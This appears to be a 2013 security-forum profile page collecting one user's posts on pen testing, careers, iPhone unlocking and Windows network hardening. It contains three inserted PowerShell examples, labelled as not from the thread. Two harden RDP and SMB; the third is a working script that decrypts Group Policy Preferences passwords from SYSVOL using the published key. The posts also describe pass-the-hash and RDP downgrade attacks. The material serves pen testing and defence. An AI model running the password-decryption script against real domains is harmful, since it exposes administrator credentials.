May 22, 2013, 11:49:46 PM *
  Show Posts
Pages: 1 ... 3 4 [5] 6 7 ... 71
61  Ethical Hacking Discussions and Related Certifications / Wireless / Re: Wireless Assessments on: March 22, 2013, 11:33:15 AM
We have occasional success with this: http://blog.depthsecurity.com/2010/11/when-8021xpeapeap-ttls-is-worse-than-no.html

62  Resources / Career Central / Re: Need Help from the experts on: March 20, 2013, 12:09:13 AM
I think this is the first time I've heard of someone trying to get into InfoSec to avoid burnout.

It seems like your current knowledge/skills would work well for some type of web application position, but you will need to get familiar with server side languages as well (PHP, ASP.NET, Java, etc.).

It's difficult to go right into a security role with no prior IT and/or development experience, so you would probably be better off trying to land a more general position and then work your way into security over time.
63  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Stealth Scans on: March 19, 2013, 11:20:32 AM
I don't think there's a straightforward answer to that. If that condition is possible anywhere, it's going to depend greatly on the make and version of the firewall. You'd have to find some sort of glitch regarding checksums, payload contents, fragment reassembly, etc. Varying the ICMP type may be useful as well (e.g., timestamp instead of echo).

Research network fuzzing, and then compare what gets through with what's in the drop log.
64  Ethical Hacking Discussions and Related Certifications / Mobile / Re: Locked iPhone on: March 19, 2013, 02:34:47 AM
Quote: It looks like Elcomsoft has a commercial tool too: http://www.elcomsoft.com/eppb.html That might be worth a shot if nothing else works and the photos are worth $80 to her.

Quote: AFAIK this works on a backup of the device, not the physical device.

Ah, you're right. I just glanced at it before I went out the door.

I'm still curious if he's tried something like the tool in the video I linked to. That seemed fairly comprehensive.
65  Ethical Hacking Discussions and Related Certifications / Mobile / Re: Locked iPhone on: March 18, 2013, 09:37:42 AM
Ah, turns out I was wrong. You can't do an offline attack because you need to extract the hardware key.

Have you tried something like this? https://www.youtube.com/watch?v=S6OIK0oL6SI

It looks like Elcomsoft has a commercial tool too: http://www.elcomsoft.com/eppb.html That might be worth a shot if nothing else works and the photos are worth $80 to her.
66  Resources / Tools / Re: Remote deployment tools on: March 18, 2013, 09:20:50 AM
Ah, maybe try WMI filtering then: http://technet.microsoft.com/en-us/library/cc779036(v=ws.10).aspx

That might help if all the target systems share a common attribute.
67  Resources / Tools / Re: Remote deployment tools on: March 17, 2013, 05:19:51 PM
If all you're doing is registry changes, just use group policy: http://technet.microsoft.com/en-us/library/cc753092.aspx

That's much easier to manage.
68  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Attack Vector for RDP on: March 16, 2013, 10:33:43 PM
I usually just try SMB because it's so much faster and uses the same account database. The only time I usually see RDP open when SMB isn't is for jump boxes, and those are usually configured to use multi-factor authentication, so there's no real point in trying a password-guessing attack.

If you can MitM with Cain, it'll try to drop the security level of the RDP session, and if successful, can capture RDP network communications in clear-text.
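An added example, not code from the thread, for the RDP downgrade described above and for the "just use group policy for registry changes" advice in the Remote deployment tools replies: it reads the two listener settings that decide whether a MitM can negotiate the session down to the legacy RDP security layer, then pushes the hardened values out as a registry policy through a GPO. The GPO name 'RDP-Hardening' and the presence of the GroupPolicy RSAT module are assumptions for this example.

```powershell
# Added example, not from the forum thread.  The listener can be negotiated
# down to the legacy "RDP Security Layer" (the layer a MitM tool drops the
# session to) when SecurityLayer is 0 or 1; 2 means TLS is required.
# UserAuthentication = 1 requires Network Level Authentication.  Values under
# the Policies key win over the per-listener values, so both are checked.
$PolicyKey   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
$ListenerKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'

function Get-EffectiveRdpValue {
    param([Parameter(Mandatory)][string]$Name)
    foreach ($key in $PolicyKey, $ListenerKey) {
        $item = Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue
        if ($null -ne $item) { return [int]$item.$Name }
    }
    return $null   # set in neither location: the OS default (Negotiate) applies
}

function Test-RdpHardening {
    # Summarises whether this host still accepts a downgrade to the RDP layer.
    $layer = Get-EffectiveRdpValue -Name 'SecurityLayer'
    $nla   = Get-EffectiveRdpValue -Name 'UserAuthentication'
    [pscustomobject]@{
        SecurityLayer         = $layer
        UserAuthentication    = $nla
        LegacyRdpLayerAllowed = ($layer -ne 2)   # 0, 1 or unset can be negotiated down
        NlaRequired           = ($nla -eq 1)
    }
}

function Set-RdpHardeningGpo {
    # Writes the same two values as Administrative Template policy into a GPO
    # (needs the GroupPolicy module from RSAT; the GPO name is an assumption).
    param([string]$GpoName = 'RDP-Hardening')
    $key = 'HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
    Set-GPRegistryValue -Name $GpoName -Key $key -ValueName 'SecurityLayer'      -Type DWord -Value 2
    Set-GPRegistryValue -Name $GpoName -Key $key -ValueName 'UserAuthentication' -Type DWord -Value 1
}

Test-RdpHardening
```

Run Test-RdpHardening on a jump box before and after the GPO applies (gpupdate /force, then restart the Remote Desktop Services service or reboot) to confirm LegacyRdpLayerAllowed flips to False. Scope the GPO by linking it to the OU that holds the RDP hosts, or with a WMI filter as suggested in the deployment thread.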
69  Resources / Tools / Re: Remote deployment tools on: March 16, 2013, 08:44:56 AM
Group Policy?

http://support.microsoft.com/kb/816102
70  Resources / Career Central / Re: Am I too old for a career change into security? on: March 15, 2013, 02:50:22 PM
Oh, in that case, you may have to move as well. I'm not trying to discourage you, but it doesn't sound like there are a lot of opportunities over there. MaXe, despite his impressive skills, actually relocated to Australia for a full-time pen testing gig: https://forum.intern0t.org/blogs/maxe/132-living-down-under-beginning.html
71  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Common vulnerabilities you expose during engagements on: March 15, 2013, 09:57:30 AM
That's a cool idea and I think that would work well with what I usually recommend, which is to implement GPO-based firewalls and block 445 inbound, except from a jump box or from a small subnet of IPs.

I know 445 can also be used for installing software remotely, but again, that could be accomplished by only allowing inbound 445 from a subset of the network/jump box.

I've personally had a difficult time getting people to implement client-side firewall changes. There's always a ton of push-back. I don't know if the sys admins just aren't as comfortable on the network side or what the deal is, but something that should be simple always seems to break everything. That's definitely a good strategy when implemented properly though.

With the network logon GPO, there's a corresponding one that disallows RDP for specified users, which is necessary since that's treated as an interactive logon, not a network logon. On the attacking side, that obviously requires cracking the hash instead of passing it, but it's not like that doesn't happen frequently. Again, disabling the service or client-side firewalls could address that as well. I guess a blanket GPO is a good safety net.

I was recently at a client that implemented something really cool called CyberArk, ever heard of it? It changes the local admin passwords to crazy random passwords, every hour! It keeps track of all of them and allows SSO through the CyberArk. Bad ass!

I've never used it personally, but it's one I suggest be researched for anyone looking at enterprise password management. I saw one that did something similar, but it only changed after it was checked out by a user, effectively providing one-time passwords. The ManageEngine utility looks promising too. It even supports multi-factor, so you need a phone or RSA token in order to check out passwords.
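The "block 445 inbound except from a jump box" control recommended above, as an added example that is not from the thread. The jump box address 10.0.0.5, the management subnet 10.0.10.0/24 and the GPO name in the usage note are assumptions for this example.

```powershell
# Added example, not from the forum thread.  Restrict inbound TCP/445 to a
# jump box and a management subnet (both addresses are assumptions).
$AllowedSmbSources = @('10.0.0.5', '10.0.10.0/24')

function Restrict-SmbInbound {
    # $PolicyStore is the local firewall by default; pass 'domain\GPO name'
    # to write the same rules into a GPO instead.
    param([string]$PolicyStore = 'PersistentStore')

    # 1. Default-deny inbound on the domain profile.  Windows evaluates explicit
    #    Block rules ahead of Allow rules, so "Allow 445 from the jump box" plus
    #    "Block 445 from everyone" would block the jump box as well; the scoped
    #    allow has to sit on top of a default block instead.
    Set-NetFirewallProfile -Profile Domain -DefaultInboundAction Block -PolicyStore $PolicyStore

    # 2. Disable any existing inbound rule that opens 445 broadly (the built-in
    #    "File and Printer Sharing (SMB-In)" rules on a local store, for example).
    Get-NetFirewallPortFilter -PolicyStore $PolicyStore |
        Where-Object { $_.Protocol -eq 'TCP' -and $_.LocalPort -eq 445 } |
        Get-NetFirewallRule |
        Where-Object { $_.Direction -eq 'Inbound' } |
        Disable-NetFirewallRule

    # 3. Add the single scoped allow rule.
    New-NetFirewallRule -DisplayName 'SMB-In (jump box and mgmt subnet only)' `
        -Direction Inbound -Protocol TCP -LocalPort 445 `
        -RemoteAddress $AllowedSmbSources -Action Allow -Profile Domain `
        -PolicyStore $PolicyStore
}

function Get-SmbInboundAllowRules {
    # Verification: every enabled inbound Allow rule that still covers TCP/445,
    # with the remote scope it applies to.  Only the scoped rule should remain.
    Get-NetFirewallPortFilter |
        Where-Object { $_.Protocol -eq 'TCP' -and $_.LocalPort -eq 445 } |
        Get-NetFirewallRule |
        Where-Object { $_.Direction -eq 'Inbound' -and $_.Enabled -eq 'True' -and $_.Action -eq 'Allow' } |
        ForEach-Object {
            [pscustomobject]@{
                Rule          = $_.DisplayName
                RemoteAddress = ($_ | Get-NetFirewallAddressFilter).RemoteAddress
            }
        }
}

Restrict-SmbInbound
Get-SmbInboundAllowRules
```

When writing into a GPO store (for example Restrict-SmbInbound -PolicyStore 'corp.example\SMB-Lockdown'), also run Set-NetFirewallProfile -Profile Domain -AllowLocalFirewallRules False -PolicyStore 'corp.example\SMB-Lockdown' so the built-in local allow rules are not merged back in on each host; that merge is one reason "simple" client-side firewall rollouts behave unexpectedly. Test from the jump box and from an ordinary workstation (Test-NetConnection host -Port 445) before widening the scope.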
72  Resources / Career Central / Re: Am I too old for a career change into security? on: March 14, 2013, 06:42:16 PM
Wow, I was expecting you to say you were 60 or something.

Why don't you leverage what you know instead of trying to start from scratch? Web app pen testing is hot right now, and your .NET knowledge clearly puts you in a good position for understanding how ASP.NET applications work behind the scenes (I assume you're doing thick-client development since you didn't mention ASP).

And even if you want to start from scratch, 29 is not too late. However, you're going to have to accept that it's going to take years of work to become competent, and you may have to take a drop in pay and seniority to migrate into a relatively different field.

If I were you, I'd use my existing knowledge and skills and take on some security responsibilities, or obtain a position that has such responsibilities, and then keep working towards a full-time security position step by step.

Also, welcome to the forums.
73  Ethical Hacking Discussions and Related Certifications / Mobile / Re: Locked iPhone on: March 14, 2013, 05:33:32 PM
I thought this was simple to do offline if you open up the phone and remove the storage device. Invalid attempts aren't going to wipe it since that depends on the running OS software. You should be able to do that almost instantly if she was only using a four-digit PIN. I don't work with this much, so I don't know the specific tools, but I swear I've heard this attack discussed multiple times.
74  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Common vulnerabilities you expose during engagements on: March 14, 2013, 05:26:07 PM
What AJ said but in addition:

 - Sync'd local admin pws
 - Lots of LM hashing in use
 - Tons of exposed 445 on EVERYTHING which makes PTH and psexec possible

There's a group policy that disallows network authentication for the local users specified. We typically make organizations roll that out after we've run a train on them using those techniques. It ruins everything for us or whoever the next year, but it's simple and effective. Disallowing delegation for privileged accounts is huge too.

Another fun one is if they're setting the local admin's password via group policy preferences and you get a standard domain user account. You can read the groups.xml on the domain controller and there are scripts floating around that'll decrypt the encrypted password in it because Microsoft disclosed the key they used.

Edit: http://carnal0wnage.attackresearch.com/2012/10/group-policy-preferences-and-getting.html
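The groups.xml attack described above, as an added example that is not code from the thread or from the linked write-up: the cpassword is AES-256-CBC with a zero IV, base64 with its padding stripped, and the key is the one Microsoft published in the MS-GPPREF specification (section 2.2.1.1.4). The XML fragment below is constructed for this example; the cpassword value in it is the example string from gpp-decrypt's usage text, not a value taken from any real domain. The SYSVOL path is derived from the environment and is an assumption.

```powershell
# Added example, not from the forum thread.
# AES-256 key published by Microsoft in MS-GPPREF 2.2.1.1.4 (shared by every domain).
$GppAesKey = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                      0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

function ConvertFrom-GppCpassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    # GPP strips the base64 '=' padding; restore it before decoding.
    switch ($Cpassword.Length % 4) {
        1 { $Cpassword = $Cpassword.Substring(0, $Cpassword.Length - 1) }
        2 { $Cpassword += '==' }
        3 { $Cpassword += '=' }
    }
    $cipherText = [Convert]::FromBase64String($Cpassword)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $GppAesKey
    $aes.IV  = New-Object byte[] 16          # the IV is sixteen zero bytes
    $plain = $aes.CreateDecryptor().TransformFinalBlock($cipherText, 0, $cipherText.Length)
    [System.Text.Encoding]::Unicode.GetString($plain)   # stored as UTF-16LE
}

function Get-GppCpassword {
    # Walks SYSVOL (readable by any domain user) for the preference files that
    # can carry a cpassword and decrypts every one found.
    param([string]$Path = "\\$env:USERDNSDOMAIN\SYSVOL\$env:USERDNSDOMAIN\Policies")
    $files = 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Printers.xml','Drives.xml'
    Get-ChildItem -Path $Path -Recurse -Include $files -ErrorAction SilentlyContinue | ForEach-Object {
        [xml]$doc = Get-Content -Path $_.FullName
        foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
            [pscustomobject]@{
                File     = $_.FullName
                UserName = $node.userName
                Password = ConvertFrom-GppCpassword -Cpassword $node.cpassword
            }
        }
    }
}

# Constructed sample Groups.xml entry; the layout follows the real file, the
# cpassword is the example value from gpp-decrypt's usage text.
[xml]$sample = @'
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2" changed="2012-10-01 12:00:00">
    <Properties action="U" newName="" fullName="" description="" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Administrator (built-in)"/>
  </User>
</Groups>
'@
foreach ($node in $sample.SelectNodes('//*[@cpassword]')) {
    '{0} -> {1}' -f $node.userName, (ConvertFrom-GppCpassword -Cpassword $node.cpassword)
}
```

Run Get-GppCpassword as an ordinary domain user to get the same view an attacker with a standard account has. Microsoft later removed the ability to set passwords in new preference items (MS14-025, May 2014), but the patch does not delete existing XML files from SYSVOL, so the check stays worthwhile on older domains; the fix is to remove the items and rotate the affected local accounts.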
75  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Common vulnerabilities you expose during engagements on: March 14, 2013, 07:20:34 AM
  • Blank/Weak admin creds for SQL Server and Tomcat
  • Still regularly see MS08-067 and NT4
  • MitM attacks - ARP poisoning, name response spoofing, etc.
  • Default credentials on web apps and devices
  • Tons of random third-party applications that fall through the patching cracks
  • VxWorks Memory disclosure is on about half of the assessments I do

I need to get going for my flight, but those are the ones that come to mind when I think of what I see over and over and over and over.
© 2013 The Ethical Hacker Network